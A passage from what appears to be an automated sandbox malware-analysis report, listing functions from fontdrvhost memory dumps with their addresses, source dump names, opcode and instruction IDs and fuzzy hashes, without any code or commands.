                                                                                                                    Function 00007FFD345AA649 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 0491a00a03924ebea1dd1d365588c251b2c62e0a935eb68341bc08257a6f1996
                                                                                                                    • Instruction ID: 7a33faeddc2fe1912b443798c03af2b386c8874ce94017713beb57ef1e2bb899
                                                                                                                    • Opcode Fuzzy Hash: 0491a00a03924ebea1dd1d365588c251b2c62e0a935eb68341bc08257a6f1996
                                                                                                                    • Instruction Fuzzy Hash: B3E0927064E3C44FC70AEB3488698547F60EF6720174A42EFC146CF1A3EA2DC889CB01
                                                                                                                    Function 00007FFD345AA719 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: fec5af4a61d2e2f04611fec90ca59a4b878b58c6172c6044695a7c8b4a39d55b
                                                                                                                    • Instruction ID: 23a249a28be1c18b864156adf5e1ff26cc38c2fcce0a10ac7f1ac4193cf5177c
                                                                                                                    • Opcode Fuzzy Hash: fec5af4a61d2e2f04611fec90ca59a4b878b58c6172c6044695a7c8b4a39d55b
                                                                                                                    • Instruction Fuzzy Hash: 09E06D71A0E7C44FC71BAA348869455BFA0EF6720174A46EEC145CF5A3EA2E8889CB01
                                                                                                                    Function 00007FFD345A83B9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction ID: 6897d1d60c01a320884d937dea95910b293b707ba0fb87ba4bf67b3a189c6c84
                                                                                                                    • Opcode Fuzzy Hash: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction Fuzzy Hash: A7E01AB194F3C04FCB56AB3488668593FA0EE6721078A54EEC189CF1B3E62D9849C711
                                                                                                                    Function 00007FFD345A1F89 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 2e41b0e454005dfc97cbc623909a148e7502fe7cde305f9c04f46d109e13c344
                                                                                                                    • Instruction ID: 7384cc3b0a984948687ef596da4e79f5fd39cbe705fa475a1c112d68d2d4878c
                                                                                                                    • Opcode Fuzzy Hash: 2e41b0e454005dfc97cbc623909a148e7502fe7cde305f9c04f46d109e13c344
                                                                                                                    • Instruction Fuzzy Hash: A0E09A6294F3C04FCB46EB3888A98453FA0EF6720078A00EEC086CF5A3E62D9849C700
                                                                                                                    Function 00007FFD34583F99 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 94fb8af0d50278739acb58482f1440c7035a8044c261aeffb00e90981ea6e00f
                                                                                                                    • Instruction ID: 527f7e4c8b76a3693f84dbc243240c93410ed350e6422d0e9fefedac3e48c6f1
                                                                                                                    • Opcode Fuzzy Hash: 94fb8af0d50278739acb58482f1440c7035a8044c261aeffb00e90981ea6e00f
                                                                                                                    • Instruction Fuzzy Hash: ADE0ED7194E3C04FD746AB75886A8497FA0EE6721078A45EEC185CF1A3D62D8845C702
                                                                                                                    Function 00007FFD345AAC19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 6e2927970b281686d7d075296cb07c2e0f612110cd2bc04bb4a907e2ab5e3727
                                                                                                                    • Instruction ID: 274ed71f57bf630801184a4261f8385397d21a7c7bdb2afac03ae9330e148cef
                                                                                                                    • Opcode Fuzzy Hash: 6e2927970b281686d7d075296cb07c2e0f612110cd2bc04bb4a907e2ab5e3727
                                                                                                                    • Instruction Fuzzy Hash: 6BE01AA158E3C04FCB06EB7488659543F619E6B21078A41DEC146CB1B3E62D8849C701
                                                                                                                    Function 00007FFD345AB148 Relevance: .2, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a488de28d3b3d2370b49b0b570b2f68e250ec913bf7aef1edceb26276dc824b
                                                                                                                    • Instruction ID: eac2980b68e0df07fdfde0167c068df7c345dc8131731c2dd61e1eb1ddf23afd
                                                                                                                    • Opcode Fuzzy Hash: 0a488de28d3b3d2370b49b0b570b2f68e250ec913bf7aef1edceb26276dc824b
                                                                                                                    • Instruction Fuzzy Hash: B8613522F1E99A0FEBD7E66884E92A87BD1FF46314F4401BBD649C31C6DD2CAC459381
                                                                                                                    Function 00007FFD345A25B8 Relevance: .1, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c6f5741b1f7d5e84cefe1ae1551f7dff032254e32d51b2361b720535db774384
                                                                                                                    • Instruction ID: 046d245cfd69d6a63baac83a75e79a69193708444aaebe689a8fe8d4156989db
                                                                                                                    • Opcode Fuzzy Hash: c6f5741b1f7d5e84cefe1ae1551f7dff032254e32d51b2361b720535db774384
                                                                                                                    • Instruction Fuzzy Hash: B941F132E09A594FE7AAEA58C8A57A537E1EB95320F04017AD40DD73C5CE2CAC84C780
                                                                                                                    Function 00007FFD34570908 Relevance: .1, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction ID: 73f0be268f4b869d438cce6e53f4dd581a08295b1ddd1d1fdaa7378430ab1ed0
                                                                                                                    • Opcode Fuzzy Hash: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction Fuzzy Hash: 4721F63170CD184FE768EA0CE88ADB977D1EB9A32130101BAE58EC7166E911EC8287C1
                                                                                                                    Function 00007FFD34571171 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 159f34c4de0c5f1b341244215ec7c62ee9609bb215ede6fed808bffbb4b5aaf1
                                                                                                                    • Instruction ID: c7b13efa7d703e7436ba28aa26f676780b8c0f2000eca3a988cf4af450ee7326
                                                                                                                    • Opcode Fuzzy Hash: 159f34c4de0c5f1b341244215ec7c62ee9609bb215ede6fed808bffbb4b5aaf1
                                                                                                                    • Instruction Fuzzy Hash: B9317231A0D68A8FDB46EB64CCA59A97FF1EF57300B0445BBD009DB293DA2C9845C751
                                                                                                                    Function 00007FFD34570C25 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d90b0c0a8a6c736dc1ac66f4cefa69363275fb447e4bcd857edff427d862593e
                                                                                                                    • Instruction ID: c6351560d65d40529ae7540b0413808d02038997c9238fc408221693e24f150d
                                                                                                                    • Opcode Fuzzy Hash: d90b0c0a8a6c736dc1ac66f4cefa69363275fb447e4bcd857edff427d862593e
                                                                                                                    • Instruction Fuzzy Hash: 6521D327F0D6899FE712AB689C620ED7FA4EF53321F1481B3C148DA193D92CA9469781
                                                                                                                    Function 00007FFD345746FE Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 77bbb1c637e440cbce0629f258385c615659897ef442f251a67ecf818b48b38a
                                                                                                                    • Instruction ID: d974336d723f2e171bfb40e2b7f1dea0b388438f4aa1af8858f35523d697cf77
                                                                                                                    • Opcode Fuzzy Hash: 77bbb1c637e440cbce0629f258385c615659897ef442f251a67ecf818b48b38a
                                                                                                                    • Instruction Fuzzy Hash: BE218631E1C82E8FEB95EB189CA42B866E1FF47311F1441B9D54EE3292DE2CAC419740
                                                                                                                    Function 00007FFD345708F8 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction ID: 863c312b6a399c42bed6afe9b30b7b0884e2f6eb32dfcd3d80d22d20cc7b0bcd
                                                                                                                    • Opcode Fuzzy Hash: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction Fuzzy Hash: 9B01F732F4DA2D0B9669D41D9C9B936BBC2DBCBB707155279E98EC3245DC14AC5342C0
                                                                                                                    Function 00007FFD34570C38 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d7d049bde4181c3e5b344f4abdb690191cee0dec0a898af006ae090847e1b43
                                                                                                                    • Instruction ID: 5d4290a6fd67896f8f3850d8490b1a7b914b823edea3bdfaa4ca60065f238b5f
                                                                                                                    • Opcode Fuzzy Hash: 1d7d049bde4181c3e5b344f4abdb690191cee0dec0a898af006ae090847e1b43
                                                                                                                    • Instruction Fuzzy Hash: 2211CE36E0D3898FE7029B688CA11ADBFE4EF43310F1480B2C144DB192D93C9A069781
                                                                                                                    Function 00007FFD345AD9D8 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9098a248078c994c672ce8cffb09515a4328e2d90b94c3deaba711b255f02831
                                                                                                                    • Instruction ID: f81e68caab8d682c3786521d4b6508853ba6fbe6b752ae5ecf69d19218b91685
                                                                                                                    • Opcode Fuzzy Hash: 9098a248078c994c672ce8cffb09515a4328e2d90b94c3deaba711b255f02831
                                                                                                                    • Instruction Fuzzy Hash: 4D017C31F1951A8BEB9AEA1898A17FDB3E2FF85300F440535E10DD31D1CE2DA888D790
                                                                                                                    Function 00007FFD34570C48 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 156dde3acd9c6d7c62897e812506644ef3bdd6e8be639f11dec30af443269812
                                                                                                                    • Instruction ID: c58df6bfad79fafb136bb9675ca66c848357a0f312da278be02f80c981942100
                                                                                                                    • Opcode Fuzzy Hash: 156dde3acd9c6d7c62897e812506644ef3bdd6e8be639f11dec30af443269812
                                                                                                                    • Instruction Fuzzy Hash: 94018C36E0D3899FEB12DB6888A119DBFF4EF03310F1581F6C545DB1A2DA389A45D781
                                                                                                                    Function 00007FFD3457480A Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 90cd31da24f513d21aaa8876a5721ec6c6bdf428686beba1be954c2cbf51b0e0
                                                                                                                    • Instruction ID: 7dc559c70bfb786322e7a1f77e40cae4f6267a9f5d69c2d2e2cb83f497dd45ca
                                                                                                                    • Opcode Fuzzy Hash: 90cd31da24f513d21aaa8876a5721ec6c6bdf428686beba1be954c2cbf51b0e0
                                                                                                                    • Instruction Fuzzy Hash: 07016D31F0C41A4FEA99F72898A46B866D1EF97312F0580B5D58ED3292DE2CEC429640
                                                                                                                    Function 00007FFD345844D9 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4460f6ca23c1460d7487779401055db18117b7dd8bb486689bc5ad3acada9ca0
                                                                                                                    • Instruction ID: 12068f2ef6ce8b02da973a7f111058565472b32dd4bdf789be8ed319c3009b39
                                                                                                                    • Opcode Fuzzy Hash: 4460f6ca23c1460d7487779401055db18117b7dd8bb486689bc5ad3acada9ca0
                                                                                                                    • Instruction Fuzzy Hash: 92019E70F0800B8BEB94DB84C8A06BE77F4EF42311F50423AD816D62D4EF7CA9018B80
                                                                                                                    Function 00007FFD34570C50 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12fa53eebf62ebb9da08bab2fa8fa9a1bf6be2d67744607018d438e98d78bcd7
                                                                                                                    • Instruction ID: 25be8b421793c3fcf5439af6c6b0cbcb97ed828622bb42fcaa63083b8af0f540
                                                                                                                    • Opcode Fuzzy Hash: 12fa53eebf62ebb9da08bab2fa8fa9a1bf6be2d67744607018d438e98d78bcd7
                                                                                                                    • Instruction Fuzzy Hash: F0011A36E0D3899FEB12DB6888A419DBFF4AF03710F2481F6C545DB192DA3C9A459781
                                                                                                                    Function 00007FFD345747D6 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction ID: 0cdae73f5bab9c2155b600cdbedac05cb516690e0afb8329a42e5fb480b866ff
                                                                                                                    • Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction Fuzzy Hash: 6CF09031E0C0298AEA95EB04DCA06B827D1EF57312F1081B9C98ED3192CE2CAC825640
                                                                                                                    Function 00007FFD345AAB89 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c1a47a211aa81d11debc4004e65e6c4a405662317bfc7976d8c88ae65d774db
                                                                                                                    • Instruction ID: e84ae377883ee10978ec842898171f440330dc61bd2a2b09a979708df92b4df7
                                                                                                                    • Opcode Fuzzy Hash: 9c1a47a211aa81d11debc4004e65e6c4a405662317bfc7976d8c88ae65d774db
                                                                                                                    • Instruction Fuzzy Hash: 31F0E52174C7C40FC71A962958A54617FE1CB5B21134A02EFC186C72A3DD58EC868741
                                                                                                                    Function 00007FFD34584C20 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction ID: fb7a40e70f8753a3c209cc93e2e7044dc19f5ce4121d6551f20bf5530ad9e22c
                                                                                                                    • Opcode Fuzzy Hash: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction Fuzzy Hash: 32F0A730F0C5174BE79A9B0898D06B53252FF47312B504175D95AC61C6FE3CE851A784
                                                                                                                    Function 00007FFD345899FA Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5c02b5b1c0ab4d58290f94bb14484ca8233b52988eb2ada77a5152e019dc462b
                                                                                                                    • Instruction ID: a4a5fa5edfe6b554b3fc2eece0b11b4b86f2fff3c40a13c834945034bc7cbc1c
                                                                                                                    • Opcode Fuzzy Hash: 5c02b5b1c0ab4d58290f94bb14484ca8233b52988eb2ada77a5152e019dc462b
                                                                                                                    • Instruction Fuzzy Hash: 81F01C31F0851A8BEB96EB04C8907A973A1EB15310FA142B6D90DD72D6DE3CAA459A80
                                                                                                                    Function 00007FFD3457393E Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction ID: c093e20fc3fb4654b8bcd7176a39a1b2664a694557c0ee5e046c9e619eafbfa1
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 28F01C71E0C0064BFB959654C8A0BAA7BA4EF96300F144079DA4ED33C2DD2CA9459709
                                                                                                                    Function 00007FFD34585658 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction ID: fa3c6fcb908f503eaa71f6d3a6831caeed5ff7896de27efa3535e4d052a6870d
                                                                                                                    • Opcode Fuzzy Hash: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction Fuzzy Hash: 0BD05E30B6090D4B8B5CA62D8468430B3D2E7AA2067D45278940BC2285ED29ECC68B80
                                                                                                                    Function 00007FFD34583F20 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Function 00007FFD345AA660 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD345A7B29 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
